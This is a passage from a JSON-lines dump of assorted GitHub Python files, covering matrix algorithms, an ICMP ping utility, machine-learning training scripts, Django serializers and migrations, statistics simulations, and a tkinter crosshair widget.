-l) // 2\n greaterThanOrEqualMid = getElementsGreaterThanOrEqual(mid, n, mat)\n if(greaterThanOrEqualMid >= k):\n r = mid -1\n else:\n l = mid +1\n return l\n\n\nn = 4\nmat = [[10, 20, 30, 40],[15, 25, 35, 45],[25, 29, 37, 48],[32, 33, 39, 50]]\nprint(f\"7th smallest element is {kthSmallest(mat, 4, 7)}\")\n\n\"\"\"\nComplexity Analysis\n\nTime Complexity : O( y * n*logn)\nWhere y = log( abs(Mat[0][0] - Mat[n-1][n-1]) )\nWe call the getElementsGreaterThanOrEqual function log ( abs(Mat[0][0] – Mat[n-1][n-1]) ) times\nTime complexity of getElementsGreaterThanOrEqual is O(n logn) since there we do binary search n \ntimes.\n\nSpace Complexity: O(1)\n\nUSING ARRAY:\n------------\nWe will make a new array and will copy all the contents of matrix in this array.After that we will\nsort that array and find kth smallest element.This will be so easier.\n\n\n\"\"\"\n\ndef kth_smallest_arr(mat, n, k):\n\n a =[0 for i in range(n*n)]\n v = 0\n\n for i in range(n):\n for j in range(n):\n a[v] = mat[i][j]\n v +=1\n \n a.sort()\n result =a[k -1]\n return result\n\nmat = [ [ 10, 20, 30, 40 ],\n [ 15, 25, 35, 45 ],\n [ 25, 29, 37, 48 ],\n [ 32, 33, 39, 50 ] \n ]\n\nres = kthSmallest(mat, 4, 7)\n \nprint(\"7th smallest element is \"+ str(res))","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/Arrays/OrderStatistics/kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_name":"kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"14098637839","text":"import xml.etree.ElementTree as ET\nimport csv\ntree = ET.parse(r\"d:\\My project\\BlogApp\\BlogApp\\fedility_service\\sample.xml\")\nprint(\"----------------------------\")\nroot = tree.getroot()\nprint(\"...................\",root)\n \nResident_data = open(r'd:\\My project\\BlogApp\\BlogApp\\fedility_service\\output.csv', 'w')\n \ncsvwriter = csv.writer(Resident_data)\nresident_head = []\ncount = 0\nfor member in root.find('ReportData'):\n print(member)\n csvwriter.writerow([member.text, \"empty\"])\n \nResident_data.close()\n\n\n\n","repo_name":"Chinjumerinamonachan/BlogApp","sub_path":"fedility_service/xml_csv_conversion.py","file_name":"xml_csv_conversion.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36707159851","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n\ndef get_bot_response(message):\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=message,\n temperature=0.5,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.5,\n presence_penalty=0.0,\n stop=[\"You:\"]\n )\n # return the text of the completion\n return response.choices[0].text.strip()\n\n\ndef chat_loop():\n print(\"Hal: Hello! How can I assist you today?\")\n\n while True:\n user_message = input(\"You: \")\n if user_message.lower() in [\"quit\", \"bye\", \"goodbye\", \"see you\"]:\n print(\"Hal: Goodbye!\")\n break\n else:\n bot_response = get_bot_response(user_message)\n print(f\"Hal: {bot_response}\")\n\n\nif __name__ == \"__main__\":\n chat_loop()\n","repo_name":"kamephis/deeptalk","sub_path":"deeptalk.py","file_name":"deeptalk.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"44781278338","text":"import socket\nimport struct\nimport argparse\nimport time\nimport threading\n\nICMP_ECHO_REQUEST = 8\n\ndef calculate_checksum(packet):\n checksum = 0\n for i in range(0, len(packet), 2):\n checksum += (packet[i] << 8) + packet[i + 1]\n checksum = (checksum >> 16) + (checksum & 0xFFFF)\n return ~checksum & 0xFFFF\n\ndef send_ping_request(dest_ip):\n icmp_checksum = 0\n icmp_id = 1 \n icmp_seq = 1\n\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, icmp_checksum, icmp_id, icmp_seq)\n data = b\"abcdefghijklmnopqrstuvwabcdefghi\"\n\n\n icmp_checksum = calculate_checksum(icmp_header + data)\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(icmp_checksum), icmp_id, icmp_seq)\n\n try:\n \n raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n raw_socket.sendto(icmp_header + data, (dest_ip, 0))\n \n # ICMP yanıtını al\n recv_packet, addr = raw_socket.recvfrom(1024)\n round_trip_time = (time.time() - start_time) * 1000\n return round_trip_time, addr[0]\n except socket.timeout:\n return None, None\n\ndef ping_host(host, timeout):\n global start_time\n start_time = time.time()\n try:\n dest_ip = socket.gethostbyname(host)\n while not stop_event.is_set():\n response_time, dns_ip = send_ping_request(dest_ip)\n if response_time is not None:\n if dns_ip:\n print(f\"{host} ({dns_ip}) Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} An error occurred while pinging the address.\")\n time.sleep(1)\n except Exception as e:\n print(f\"{host} An error occurred while pinging the address: {str(e)}\")\n\ndef ping_hosts_from_file(file_path, timeout):\n try:\n with open(file_path, \"r\") as file:\n targets = file.read().splitlines()\n except FileNotFoundError:\n print(f\"{file_path} File not found.\")\n return\n except Exception as e:\n print(f\"An error occurred while opening the file: {str(e)}\")\n return\n\n for target in targets:\n ping_thread = threading.Thread(target=ping_host, args=(target, timeout))\n ping_thread.start()\n\ndef main():\n global stop_event\n stop_event = threading.Event()\n\n parser = argparse.ArgumentParser(description=\"Tool used for ICMP ping to IP addresses.\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-u\", \"--url\", help=\"Pings an IP or domain address\", type=str)\n group.add_argument(\"-l\", \"--list\", help=\"Pings IP or domain addresses from a file\", type=str)\n parser.add_argument(\"-t\", \"--timeout\", help=\"Maximum timeout for ping responses (seconds)\", type=float, default=2)\n try:\n args = parser.parse_args()\n except KeyboardInterrupt:\n stop_event.set()\n return\n\n if args.url:\n ping_host(args.url, args.timeout)\n\n if args.list:\n ping_hosts_from_file(args.list, args.timeout)\n\n try:\n while not stop_event.is_set():\n pass\n except KeyboardInterrupt:\n stop_event.set()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sefabasnak/MULTIPLE-PING","sub_path":"multiple-ping.py","file_name":"multiple-ping.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72503382832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Apr 13、4\n\n@author: xiaoheizai\n\"\"\"\n\n'''\n给定一个二维的矩阵,包含 'X' 和 'O'(字母 O)。\n\n找到所有被 'X' 围绕的区域,并将这些区域里所有的 'O' 用 'X' 填充。\n\n示例:\n\nX X X X\nX O O X\nX X O X\nX O X X\n运行你的函数后,矩阵变为:\n\nX X X X\nX X X X\nX X X X\nX O X X\n解释:\n\n被围绕的区间不会存在于边界上,换句话说,任何边界上的 'O' 都不会被填充为 'X'。 \n任何不在边界上,或不与边界上的 'O' 相连的 'O' 最终都会被填充为 'X'。\n如果两个元素在水平或垂直方向相邻,则称它们是“相连”的。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/surrounded-regions\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass UnionFind(object):\n def __init__(self, n):\n self.uf = [-1 for i in range(n)]\n \n def find(self, node):\n temp = node\n while self.uf[node] > 0:\n node = self.uf[node]\n \n while self.uf[temp] > 0:\n self.uf[temp], temp = node, self.uf[temp]\n \n return node\n \n def union(self, node1, node2):\n root1 = self.find(node1)\n root2 = self.find(node2)\n \n if root1 == root2:\n return\n if self.uf[root1] < self.uf[root2]:\n self.uf[root1] += self.uf[root2]\n self.uf[root2] = root1\n else:\n self.uf[root2] += self.uf[root1]\n self.uf[root1] = root2\n \n def is_connect(self, node1, node2):\n return self.find(node1) == self.find(node2)\n\nclass Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n row = len(board)\n if row == 0:\n return board\n col = len(board[0])\n union_table = UnionFind(row * col + 1)\n virtual_node = row * col\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j == 0 or i == row -1 or j == col - 1:\n if board[i][j] == \"O\":\n union_table.union(index, virtual_node)\n if board[i][j] == \"O\":\n if i < row - 1 and board[i+1][j] == \"O\":\n index_down = (i+1) * col + j\n union_table.union(index, index_down)\n if j < col - 1 and board[i][j+1] == \"O\":\n index_right = index + 1\n union_table.union(index, index_right)\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j ==0 or i == row - 1 or j == col - 1:\n continue\n else:\n if not union_table.is_connect(index, virtual_node):\n board[i][j] = \"X\"","repo_name":"xiaoheizai/python_for_leetcode","sub_path":"并查集/130 被围绕的区域.py","file_name":"130 被围绕的区域.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35589093729","text":"# This module receives and processes the bar data\n# First draft 2016/10/3\n# This draft 2016/10/6\n\n\nimport pandas as pd\nimport datetime\n\n\n# The sample data is a stock in HS300 taken randomly from Tushare \nclass DataHandler2(object):\n\n def __init__(self, path):\n self.path = path\n self.data = pd.read_csv(self.path)\n self.data.returni = []\n for i in range(1, len(self.data)):\n self.data.returni.append(\n (self.data.close[i] - self.data.close[i - 1]) / self.data.close[i - 1])\n","repo_name":"FreeA7/financial_kmeans","sub_path":"Problem2_10_03/datahandler2.py","file_name":"datahandler2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20771798845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ktapp', '0010_film_directors_cache'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageCountCache',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('number_of_messages', models.PositiveIntegerField(default=0)),\n ('owned_by', models.ForeignKey(related_name='owned_message_count', to=settings.AUTH_USER_MODEL)),\n ('partner', models.ForeignKey(related_name='partner_message_count', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='messagecountcache',\n unique_together=set([('owned_by', 'partner')]),\n ),\n migrations.AddField(\n model_name='ktuser',\n name='number_of_messages',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"cu2/KT","sub_path":"ktapp/migrations/0011_auto_20150902_1833.py","file_name":"0011_auto_20150902_1833.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"} +{"seq_id":"12647321031","text":"from hpsklearn import HyperoptEstimator, any_sparse_classifier, tfidf,liblinear_svc\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn import metrics\nfrom hyperopt import tpe\nimport numpy as np\nfrom sklearn.metrics import accuracy_score,classification_report\n# Download the data and split into training and test sets\n\nimport pandas as pd, numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer,HashingVectorizer\nfrom sklearn import svm\nimport logging\nimport numpy as np\nimport time\nimport os\nimport pickle # pickle模块2\nimport logging\nimport os\nimport sys\nimport json\nimport datetime\nfrom collections import defaultdict\n\ncurrentUrl = os.path.dirname(__file__)\nmost_parenturl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nm_p, m_c = os.path.split(most_parenturl)\nwhile 'xunfei' not in m_c:\n m_p, m_c = os.path.split(m_p)\n\nsys.path.append(os.path.join(m_p, m_c))\nfrom class_model.load_data import load_data\nfrom sklearn.metrics import accuracy_score\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n# 1281312322\ncolumn = \"word_seg\"\nproject_path=\"/data/tanggp/xun_class//aichallenge/\"\ntest_path=os.path.join(project_path,\"apptype_train.test_jieba_json\")\ntrain_path=os.path.join(project_path,\"apptype_train.train_jieba_json\")\npred_path=os.path.join(project_path,\"app_desc.jieba_json\")\nlabel_dic = {}\nlabel_num = 0\nt = time.time()\n\nimport json\n\nfrom sklearn.calibration import CalibratedClassifierCV\n\ndef get_data_set(flie):\n global label_num\n with open(flie) as f:\n lines = f.readlines()\n data_x = []\n data_y = []\n apps=[]\n for li in lines:\n li=json.loads(li)\n text=li.get(\"jieba\")\n label1=li.get(\"label\",\"no\") #label_1st\n app=li.get(\"app\")\n apps.append(app)\n if label1 not in label_dic.keys():\n label_dic[label1] = label_num\n label_num += 1\n\n label = label_dic.get(label1)\n\n data_x.append(text)\n data_y.append(label)\n assert len(data_x) == len(data_y)\n return data_x, np.array(data_y).astype(int),apps\n\n\ndef svm_train():\n # train_x, train_y,apps = get_data_set(train_path)\n # test_x, test_y,apps = get_data_set(test_path)\n # pred_x,_,apps=get_data_set(pred_path)\n train_x, train_y, test_x, test_y, pred_x, apps, label_dic = load_data()\n # with open(CHANNEL_MODEL + 'svm_label.pkl', 'wb') as f:\n # pickle.dump(label_dic, f)\n\n logging.info('train {} test{}'.format(len(train_x), len(test_x)))\n t=time.time()\n logging.info(\"===\"*8)\n\n estim = HyperoptEstimator(classifier=liblinear_svc('clf'),max_evals=10,\n preprocessing=[\n tfidf('tfidf',ngram_range=(1, 4), min_df=10, max_df=0.9, use_idf=1, smooth_idf=1, sublinear_tf=1)],\n algo=tpe.suggest, trial_timeout=1200,refit=False)\n logging.info(estim)\n estim.fit(train_x, train_y)\n best_model=estim.best_model()\n\n logging.info(best_model)\n learner=best_model['learner']\n preprocs=best_model['preprocs'][0]\n\n lin_clf = learner\n lin_clf = CalibratedClassifierCV(lin_clf)\n data_set=train_x+test_x+pred_x\n preprocs.fit_transform(data_set)\n trn_term_doc=preprocs.transform(train_x)\n lin_clf.fit(trn_term_doc, train_y)\n\n test_term_doc = preprocs.transform(test_x)\n test_preds_prob = lin_clf.predict_proba(test_term_doc)\n test_preds_=lin_clf.predict(test_term_doc)\n logging.info('accuracy_score {} top1 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n test_preds=[]\n for prob in test_preds_prob:\n test_preds.append(list(prob.argsort()[-2:][::-1]))\n\n test_preds_ = []\n for rea, tes in zip(test_y, test_preds):\n prd = tes[0]\n for te in tes:\n if rea == te:\n prd = te\n test_preds_.append(prd)\n logging.info('accuracy_score {} top2 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n\n\n #logging.info(estim.fit().score(test_x, test_y))\n # <>\n #logging.info(estim.best_model())\n # <>\n\n\n\ndef svm_pred():\n logging.info('pred')\n test_x, test_y = get_data_set(pred_path)\n with open(project_path + 'tfidf.pkl', 'rb') as f:\n vec = pickle.load(f)\n\n test_term_doc = vec.transform(test_x)\n\n with open(project_path + 'svm_model.pkl', 'rb') as f:\n lin_clf = pickle.load(f)\n\n test_preds = lin_clf.predict(test_term_doc)\n\n from sklearn.metrics import confusion_matrix, classification_report\n\n logging.info('\\n {}'.format(classification_report(test_y, test_preds)))\n\nif __name__ == \"__main__\":\n svm_train()\n #svm_pred()\n\n","repo_name":"godkillok/xunfei","sub_path":"class_model/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20162960457","text":"from rest_framework import serializers\n\nfrom loads.models import Load, LoadTruck, Location, Truck\n\n\nclass TruckSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Truck.\"\"\"\n location = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n class Meta:\n model = Truck\n fields = ('id', 'uid', 'location', 'capacity')\n read_only_fields = ('uid', 'capacity')\n\n\nclass LoadUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadBaseSerializer(serializers.ModelSerializer):\n \"\"\"Base serializer for load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n\nclass LoadCreateSerializer(LoadBaseSerializer):\n \"\"\"Serializer for create Load.\"\"\"\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadListSerializer(LoadBaseSerializer):\n \"\"\"Serializer for list view of Load.\"\"\"\n near_trucks = serializers.IntegerField()\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'near_trucks')\n\n\nclass TruckDistanceSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for truck - distance.\"\"\"\n truck = serializers.SlugRelatedField(\n slug_field='uid',\n read_only=True\n )\n\n class Meta:\n fields = ('truck', 'distance')\n model = LoadTruck\n\n\nclass LoadRetrieveSerializer(LoadBaseSerializer):\n \"\"\"Serializer for retrieve Load.\"\"\"\n trucks = TruckDistanceSerializer(many=True)\n\n class Meta:\n model = Load\n fields = (\n 'id', 'pick_up', 'delivery', 'weight', 'description', 'trucks'\n )\n","repo_name":"KuzenkovAG/truck_service","sub_path":"truck_service/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22482281238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# =============================================================================\n# Imports & Function definitions\n# =============================================================================\nfrom dotter.models import DotterModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# =============================================================================\n# Parameters\n# =============================================================================\n\ndef test_vegetation():\n \"\"\"\n testcase with vegetation growth\n \"\"\"\n deltabeek = DotterModel('tests/testcases/vegetation/config.ini')\n deltabeek.run()\n\ndef test_backwater():\n \"\"\"\n Tests whether the numerical approximation tends to the equilibrium\n \"\"\"\n deltabeek = DotterModel('tests/testcases/backwater/config.ini')\n\n # The accuracy of the numerical resolution depends on the h_resolution\n deltabeek.grid.h_resolution = 50\n deltabeek.grid.max_depth = 5\n deltabeek.grid.generate_grid()\n\n # Equilibrium depth\n depth = 1.568138\n\n # Check whether above depth is equilibrium\n h = deltabeek.grid.bedlevel[0] + depth\n A = deltabeek.grid.wet_area[0](h)\n R = deltabeek.grid.hydraulic_radius[0](h)\n i = deltabeek.grid.bedslope[0]\n C = R ** (1 / 6.) / 0.04\n\n assert(np.abs(3.50 - A * C * np.sqrt(R * i)) < 0.001)\n\n deltabeek.run(timesteps=[deltabeek.grid.time[0]])\n error = np.abs(deltabeek.output.waterdepth[0][0] - depth)\n assert (error < 0.001)\n","repo_name":"kdberends/dotter","sub_path":"tests/test_hydraulics.py","file_name":"test_hydraulics.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9712132913","text":"import sys\nimport json\nfrom model import SalesPredictionLSTM\nfrom data_utils import load_timeseries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ntrain_file = \"data/sales.csv\"\nwindow_size = 6\ntrain_test_split = 0.8\n(\n x_train, y_train, x_test, y_test,\n x_test_raw, y_test_raw,\n last_window_raw, last_window\n) = load_timeseries(train_file, window_size, train_test_split)\n\nmodel = SalesPredictionLSTM(\n layers=[window_size, 100, 100, 1],\n dropout=0.2,\n batch_size=100,\n epochs=100,\n validation_split=0.1\n)\n\nmodel.build_model()\n\nmodel.train(x_train, y_train)\nmodel.save_weights('weights.h5')\n","repo_name":"sushantMoon/isi-nna","sub_path":"assignment7/server-train.py","file_name":"server-train.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29556550837","text":"# This is the first cell with code: set up the Python environment\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.stats import binom\nimport pandas as pd\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import clear_output, display, HTML\n\ndef binoLowerCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - scipy.stats.binom.cdf(x-1, n, q)\n lo = sp.optimize.brentq(f, 0.0, p, xtol=inc)\n return lo\n\ndef binoUpperCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n hi = 1.0\n if (x < n):\n f = lambda q: scipy.stats.binom.cdf(x, n, q) - (1-cl)\n hi = sp.optimize.brentq(f, p, 1.0, xtol=inc) \n return hi\n\n# Population of two values, {0, 1}, in various proportions. Amounts to Binomial random variable\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([.001, .01, 0.1]) # mixture fractions, proportion of 1s in the population\nalpha = 0.05 # 1- (confidence level)\nreps = int(1.0e3) # just for demonstration\nvals = [0, 1]\n\nsimTable = pd.DataFrame(columns=('fraction of 1s', 'sample size', 'Student-t cov', 'Binom cov', 'Student-t len', 'Binom len'))\nfor p in ps:\n popMean = p\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1.0-alpha/2, df=n-1)\n samMean = np.zeros(reps)\n sam = sp.stats.binom.rvs(n, p, size=reps)\n samMean = sam/float(n)\n samSD = np.sqrt(samMean*(1-samMean)/(n-1))\n coverT = (np.fabs(samMean-popMean) < tCrit*samSD).sum()\n aveLenT = 2*(tCrit*samSD).mean()\n coverB = 0\n totLenB = 0.0\n for r in range(int(reps)): \n lo = binoLowerCL(n, sam[r], cl=1.0-alpha/2)\n hi = binoUpperCL(n, sam[r], cl=1.0-alpha/2)\n coverB += ( p >= lo) & (p <= hi)\n totLenB += hi-lo\n simTable.loc[len(simTable)] = p, n, str(100*float(coverT)/float(reps)) + '%', str(100*float(coverB)/float(reps)) + '%', str(round(aveLenT,4)), str(round(totLenB/float(reps),4))\n#\nansStr = '

Simulated coverage probability and expected length of Student-t and Binomial confidence intervals for a {0, 1} population

' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '%.
Estimated from ' + str(int(reps)) + ' replications.'\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\n# Nonstandard mixture: a pointmass at zero and a uniform[0,1]\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([0.9, 0.99, 0.999]) # mixture fraction, weight of pointmass\nthresh = [0.2, 0.1, 0.01, .001]\nalpha = 0.05 # 1- (confidence level)\nreps = 1.0e3 # just for demonstration\n\ncols = ['mass at 0', 'sample size', 'Student-t cov']\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' cov')\ncols.append('Student-t len')\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' len')\n\n\nsimTable = pd.DataFrame(columns=cols)\n\nfor p in ps:\n popMean = (1-p)*0.5 # p*0 + (1-p)*.5\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1-alpha, df=n-1)\n coverT = 0 # coverage of t intervals\n tUp = 0 # mean upper bound of t intervals\n coverB = np.zeros(len(thresh)) # coverage of binomial threshold intervals\n bUp = np.zeros(len(thresh)) # mean upper bound of binomial threshold intervals\n for rep in range(int(reps)):\n sam = np.random.uniform(size=n)\n ptMass = np.random.uniform(size=n)\n sam[ptMass < p] = 0.0\n samMean = np.mean(sam)\n samSD = np.std(sam, ddof=1)\n tlim = samMean + tCrit*samSD\n coverT += (popMean <= tlim) # one-sided Student-t\n tUp += tlim\n for i in range(len(thresh)):\n x = (sam > thresh[i]).sum() # number of binomial \"successes\"\n pPlus = binoUpperCL(n, x, cl=1-alpha)\n blim = thresh[i]*(1.0-pPlus) + pPlus\n coverB[i] += (popMean <= blim)\n bUp[i] += blim\n theRow = [p, n, str(100*float(coverT)/float(reps)) + '%']\n for i in range(len(thresh)):\n theRow.append(str(100*float(coverB[i])/float(reps)) + '%')\n theRow.append(str(round(tUp/float(reps), 3)))\n for i in range(len(thresh)):\n theRow.append(str(round(bUp[i]/float(reps), 3)))\n simTable.loc[len(simTable)] = theRow\n#\nansStr = '

Simulated coverage probability and expected lengths of one-sided Student-t confidence intervals and threshold ' + 'Binomial intervals for mixture of U[0,1] and pointmass at 0

' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '%.
Estimated from ' + str(int(reps)) + ' replications.'\n\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\nget_ipython().run_line_magic('run', 'talkTools.py')\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/binom.py","file_name":"binom.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44714386104","text":"from __future__ import division\nimport math\nimport sys\nif sys.version_info.major > 2:\n import tkinter as tk\nelse:\n import Tkinter as tk\n\nfrom .. import tkutil as tku\n\ntorads = math.pi / 180\ndef hit(x, y, tx, ty, vx, vy):\n \"\"\"Calculate hit point given x, y of a corner.\"\"\"\n if not vx:\n mul = (ty-y) / vy\n elif not vy:\n mul = (tx-x) / vx\n else:\n mulx = (tx-x) / vx\n muly = (ty-y) / vy\n mul = muly if abs(mulx) > abs(muly) else mulx\n return x + vx*mul, y + vy*mul\n\nclass Crosshairs(object):\n \"\"\"Crosshairs on mouse.\"\"\"\n TAG = '_crosshair'\n def __init__(self, master):\n self._vec = (1, 0)\n self.idns = [\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0)]\n for idn in self.idns:\n master.addtag(self.TAG, 'withtag', idn)\n for idn in self.idns[::2]:\n master.addtag('_crossh', 'withtag', idn)\n for idn in self.idns[1::2]:\n master.addtag('_crossv', 'withtag', idn)\n master.itemconfigure(self.TAG, state='disabled')\n for idn in self.idns[:2]:\n master.addtag('_crossb', 'withtag', idn)\n master.itemconfigure(idn, fill='black', width=3)\n for idn in self.idns[2:]:\n master.addtag('_crossf', 'withtag', idn)\n master.itemconfigure(idn, fill='white', width=1)\n tag = 'CanvasCrosshairs'\n if tag not in master.bindtags():\n tku.subclass(master, tag)\n if not master.bind_class(tag):\n tku.add_bindings(master, tag, tupit=tku.memberit(self))\n master.configure(cursor='none')\n\n def angle(self, angleorvx, vy=None, degrees=True):\n \"\"\"Set the crosshairs angle.\n\n angleorvx: angle (if vy is None) else vector x direction\n vy: if given, then the crosshair direction is (angleorvx, vy)\n degrees: if vy is None, is angleorvx in degrees or radians.\n \"\"\"\n if vy is None:\n if degrees:\n angle = (angleorvx % 90) * torads\n else:\n angle = angleorvx % (math.pi / 4)\n self._vec = (math.cos(angle), math.sin(angle))\n else:\n vx = angleorvx\n if vx * vy > 0:\n self._vec = abs(vx), abs(vy)\n else:\n if not (vx or vy):\n self._vec = (1, 0)\n else:\n self._vec = abs(vy), abs(vx)\n\n @tku.Bindings('', '')\n @classmethod\n def toggle(cls, widget):\n if widget.itemcget(cls.TAG, 'state') == 'disabled':\n widget.itemconfigure(cls.TAG, state='hidden')\n else:\n widget.itemconfigure(cls.TAG, state='disabled')\n\n @tku.Bindings('')\n @classmethod\n def show(cls, widget, x, y):\n widget.itemconfigure(cls.TAG, state='disabled')\n Crosshairs.draw_crosshairs(widget, x, y)\n\n @tku.Bindings('')\n @classmethod\n def hide(cls, widget):\n widget.itemconfigure(cls.TAG, state='hidden')\n\n @tku.Bindings('')\n @staticmethod\n def draw_crosshairs(widget, x, y):\n l, t = widget.xy(0,0)\n r, b = l+widget.winfo_width(), t+widget.winfo_height()\n x, y = widget.xy(x, y)\n self = widget.crosshairs\n i1, i2, i3, i4 = self.idns\n vx, vy = self._vec\n if vy:\n x1, y1 = hit(x, y, l, t, -vx, -vy)\n x2, y2 = hit(x, y, r, b, vx, vy)\n widget.coords(i1, x1, y1, x2, y2)\n widget.coords(i3, x1, y1, x2, y2)\n x1, y1 = hit(x, y, r, t, -vy, vx)\n x2, y2 = hit(x, y, l, b, vy, -vx)\n widget.coords(i2, x1, y1, x2, y2)\n widget.coords(i4, x1, y1, x2, y2)\n else:\n widget.coords(i1, l, y, r, y)\n widget.coords(i3, l, y, r, y)\n widget.coords(i2, x, t, x, b)\n widget.coords(i4, x, t, x, b)\n\n","repo_name":"j-hsiao/py-labeler","sub_path":"jhsiao/labeler/crosshairs.py","file_name":"crosshairs.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 